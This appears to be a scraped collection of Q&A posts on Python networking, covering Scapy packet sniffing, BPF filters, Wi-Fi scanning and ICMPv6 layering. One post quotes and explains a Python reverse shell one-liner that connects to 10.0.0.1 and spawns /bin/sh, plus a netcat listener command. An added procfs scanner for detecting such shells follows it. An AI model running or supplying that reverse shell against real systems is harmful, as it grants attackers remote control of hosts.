I've been following Seitz's Black Hat Python book and he gives an example of capturing network traffic using the scapy library.
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
def packet_callback(packet):
    print packet.show()
sniff(filter="",iface="any",prn=packet_callback, count = 1)
I run the above function as follows: sudo python sniffer.py and open Google Chrome to a page. No packets get captured. I do a ping request to a domain and nothing gets captured. I was expecting the print packet.show() line to print the first packet being sent.
All of this is being run on a Macbook Pro on a wireless internet connection.
Can someone help me troubleshoot?
If you want scapy to sniff on all interfaces, just remove the iface = "any" parameter. Since "any" is not an interface, scapy cannot sniff.
Also remove the filter parameter, since it is not applying any filter.
The correct command would look like this:
sniff(prn=packet_callback, count = 1)
The iface argument expects the exact name of the interface. Most likely you do not have an interface named ANY. You can omit the argument, which is most likely what you have to do in this case, or use the actual interface name (such as "eth0").
I actually get an exception "No such device", when I try your code. Is this the actual code you run?
Also, please state your scapy version. I am using the python3 version, which you can get from http://github.com/phaethon/scapy or as scapy-python3.
Related
I am trying to write code in Python that sniffs packets on my computer and prints the DNS ones, but for some reason I keep getting this error.
This is my code:
from scapy.all import *
from scapy.layers.dns import DNS, DNSQR
from scapy.layers.inet import IP, UDP

def print_packets(pkg):
    if DNS in pkg:
        pkg.show()

def is_dns(pkg):
    if "DNS Resource Record" in pkg:
        return DNS
    return False

def main():
    packets = sniff(filter=is_dns, prn=print_packets)

if __name__ == "__main__":
    main()

Can someone tell me why it's happening and how I can fix it?
why it's happening?
You appear to be encountering a permission error.
That is, the sniff( ... ) call is quite standard,
and the subsequent request for ETH_P_ALL is what you want.
But you seem to lack permission to see such interfaces.
how can I fix it?
Note that the intro / install docs always take care
to specify UID=0 root access, e.g. $ sudo ./run_scapy.
On your platform I'm not sure what exactly it takes
to convince the ether API that you're a legitimate admin.
Follow the docs:
the latest version of Scapy supports Windows out-of-the-box.
If really nothing seems to work, consider skipping the Windows version and using Scapy from a Linux Live CD ...
You may not be able to capture WLAN traffic on Windows ....
If you believe a response is an answer to your question,
it is appropriate to accept it.
Consider:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
So this is a Python reverse shell one-liner and can be found easily just by googling it. To better understand this, let's write it on multiple lines:
1# import socket,subprocess,os
2# s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
3# s.connect(("10.0.0.1",1234))
4# os.dup2(s.fileno(),0)
5# os.dup2(s.fileno(),1)
6# os.dup2(s.fileno(),2)
7# p=subprocess.call(["/bin/sh","-i"])
Most parts of this are pretty easy to understand. In the first line, we import the necessary modules. In the second line we make a socket object using the IPv4 family and TCP protocol. Line three is where we connect to our server (attacker machine) and in lines 4, 5, and 6, we duplicate the socket file descriptor as 0 (standard input), 1 (standard output), and 2 (standard error) (I can be wrong here). In the end, we start the /bin/sh shell in interactive mode.
This is working fine. All we need is just to change the IP address and port to connect, and on the other end (server) we need to listen for an incoming connection, which can be done easily using netcat:
nc -nlvp 1234
I just don't understand how, after establishing the reverse shell, this client machine (the machine that we run the Python reverse shell one-liner on) can send the output of commands that it received from the server. I mean, there aren’t any send() or recv() methods.
I tried to write a server myself using Python, but it does not work properly and I can't receive the output of my commands.
(But here's a Python reverse shell that I have coded, and it works fine: https://github.com/ramixix/Python_Reverse_Shell.git. I’d be happy if you check it out.)
How does it work and how can I write a server for it?
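The dup2() calls in the question leave descriptors 0, 1 and 2 of the shell pointing at one socket, and that state is visible in Linux procfs. The following is an added example, not part of the original post, that flags such processes; the sample tree built by build_sample_proc (PIDs 100 and 200, inode 48213) is constructed so the code runs offline.

```python
import os
import tempfile

STDIO_FDS = (0, 1, 2)

def stdio_targets(pid, proc_root="/proc"):
    """Return {fd: link target} for fds 0-2 of a process (Linux procfs)."""
    targets = {}
    for fd in STDIO_FDS:
        link = os.path.join(proc_root, str(pid), "fd", str(fd))
        try:
            targets[fd] = os.readlink(link)
        except OSError:
            # Process exited, fd closed, or no permission to inspect it.
            targets[fd] = None
    return targets

def has_socket_stdio(targets):
    """True when stdin, stdout and stderr all resolve to the same socket."""
    values = set(targets.values())
    return len(values) == 1 and (next(iter(values)) or "").startswith("socket:")

def scan(proc_root="/proc"):
    """List PIDs whose three standard descriptors are one socket."""
    hits = []
    for entry in os.listdir(proc_root):
        if entry.isdigit() and has_socket_stdio(stdio_targets(entry, proc_root)):
            hits.append(int(entry))
    return sorted(hits)

def build_sample_proc(root):
    """Constructed sample: PID 100 sits on a terminal, PID 200 on a socket."""
    sample = {100: "/dev/pts/0", 200: "socket:[48213]"}
    for pid, target in sample.items():
        fd_dir = os.path.join(root, str(pid), "fd")
        os.makedirs(fd_dir)
        for fd in STDIO_FDS:
            # Dangling symlinks are fine: only the link text is read.
            os.symlink(target, os.path.join(fd_dir, str(fd)))
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(scan(build_sample_proc(tmp)))
```

Socket-backed standard descriptors also occur legitimately (inetd-style services, for example), so hits are leads to triage against the process's parent and command line.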
A friend and I are currently making a sniffing application in Python using the Scapy library. We have a GUI interface where we can choose filters and protocols. We want to sniff the network using one or more filters but don't know how to do it. For now we tried the following code:
capture=scapy.sniff(filter="tcp and udp",timeout=5)
print(capture)
It works well but it sniffs using only the first filter (tcp filter in this case). We also tried the following code, but with the same result:
capture1=scapy.sniff(filter="tcp",timeout=5)
capture2=scapy.sniff(filter="udp",timeout=5)
print(capture1)
print(capture2)
So, is it possible to sniff using more than one filter and if so, do you have any idea?
Thanks
You are telling Scapy to sniff packets that are both TCP and UDP.
When I try this (Linux, current Scapy development version), I get a warning message tcpdump: expression rejects all packets and the filter is not applied.
You probably want to use or instead of and: capture=scapy.sniff(filter="tcp or udp",timeout=5).
The thing I am trying to achieve: I want my Android app to get a list of all available WLAN connections within the range of a device with a WLAN (at that point the device is an access point). Then I want to tell that device which network to connect to. So far so good.
I am trying to access the WLAN module on my OpenWrt device via Python. I am using this [1] Python module. When I execute the following example code
python iwlist.py wlan0 scanning
I get the error
Interface does not support scanning
Then I started to dig inside of the code, and the real error message is this one:
Argument list too long
and this error is coming from the module (from the file iwlibs.py). The exact code snippet (class Iwrange, update()) where it is coming from:
buff, s = iwstruct.pack_wrq(640)
print "Now comes the error"
status, result = iwstruct.iw_get_ext(self.ifname,
                                     pythonwifi.flags.SIOCGIWRANGE,
                                     data=s)
I don't know if it is of any help, but I also checked the buff variable and it just says 0x00 (I guess there should be some other stuff too because it is indicating some address in the memory, but of course I could be wrong too and the buffer is just being initialized there).
So, I am not sure what the problem is; it seems to me, maybe, that the reserved space (or buffer?) is too small for the stuff that is being returned.
Does anybody know what else I could try in order to get this working?
And one more thing, I also downloaded wireless_tools and now I can use iwlist. I can also scan and get the list of all surrounding WLAN networks. So it seems the hardware is working fine, I am just not accessing it properly with Python.
[1] https://pypi.python.org/pypi/python-wifi/0.6.1
Just as an info, I solved my issue by changing the module I have been using. Now I am using [1]. When I execute this code
from wifi import Cell, Scheme
print "%s" %(Cell.all('wlan0'))
I get a list with all surrounding networks. Then I just have to choose one of them (by the SSID) and make my connection.
[1] https://wifi.readthedocs.io/en/latest/
I am trying to send an ICMPv6 Echo Request from within a Python script. When I do this within the Scapy environment, it works perfectly. I can see the packet exchanges within Wireshark. However, when I have this code:
# Scapy commands
ip = IPv6()
ip.dst = "fe80::ba8d:12ff:fe42:98c8"
ip.show()
print'-----------------------------------------'
request = ICMPv6EchoRequest()
request.id=98
request.show()
print'-----------------------------------------\n'
send(request/ip) #send Echo Request w/ IPv6 Header
in my python script and then call the script, I get this:
WARNING: Mac address to reach destination not found. Using broadcast.
WARNING: No IPv6 underlayer to compute checksum. Leaving null.
.
Sent 1 packets.
But no packet is actually sent... does anyone have any idea what I'm doing wrong?
EDIT: I should have mentioned that the sending node is a Virtual Ubuntu Linux Machine and the attempted Receiver is a Macbook on a bridged network adapter.
In Scapy, when you use the / operator the operand on the left encapsulates or places the operand on the right as its data, or underlayer. It's what will come next in the packet.
Your problem is your sending line -
send(request/ip)
You have them reversed. This produces a packet where the IP Layer is the data of the ICMPv6 layer. This is why you are getting the error WARNING: No IPv6 underlayer to compute checksum. Leaving null, because you aren't actually putting anything there since your layers are in the wrong order.
This is what you meant to do.
send(ip/request)
Change that one send line and you should see the results you expect.
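The checksum warning follows from the protocol itself: the ICMPv6 checksum covers a pseudo-header built from the addresses of the IPv6 header that carries the message, so the ICMPv6 layer has to sit inside the IPv6 layer. The following is an added example in plain Python (no Scapy), not code from the original answer; the destination and id=98 come from the question, while the source address fe80::1 is a constructed value.

```python
import ipaddress
import struct

ICMPV6_NEXT_HEADER = 58   # IPv6 Next Header value for ICMPv6
ECHO_REQUEST = 128        # ICMPv6 type for Echo Request

def internet_checksum(data):
    """16-bit one's-complement sum used by ICMPv6 (RFC 1071 style)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def pseudo_header(src, dst, upper_len):
    """IPv6 pseudo-header: src, dst, upper-layer length, 3 zero bytes, next header."""
    return (ipaddress.IPv6Address(src).packed
            + ipaddress.IPv6Address(dst).packed
            + struct.pack("!I3xB", upper_len, ICMPV6_NEXT_HEADER))

def echo_request(src, dst, ident, seq=0, payload=b""):
    """Build an Echo Request; the checksum cannot be filled in without src/dst."""
    unsummed = struct.pack("!BBHHH", ECHO_REQUEST, 0, 0, ident, seq) + payload
    csum = internet_checksum(pseudo_header(src, dst, len(unsummed)) + unsummed)
    return struct.pack("!BBHHH", ECHO_REQUEST, 0, csum, ident, seq) + payload

def checksum_ok(src, dst, message):
    """Receiver-side check: pseudo-header plus message must sum to zero."""
    return internet_checksum(pseudo_header(src, dst, len(message)) + message) == 0

SRC = "fe80::1"                      # constructed source address
DST = "fe80::ba8d:12ff:fe42:98c8"    # destination from the question

if __name__ == "__main__":
    msg = echo_request(SRC, DST, ident=98)
    print(msg.hex(), checksum_ok(SRC, DST, msg))
```

With no enclosing IPv6 header there are no addresses to feed into pseudo_header, which is the situation the "No IPv6 underlayer" warning reports.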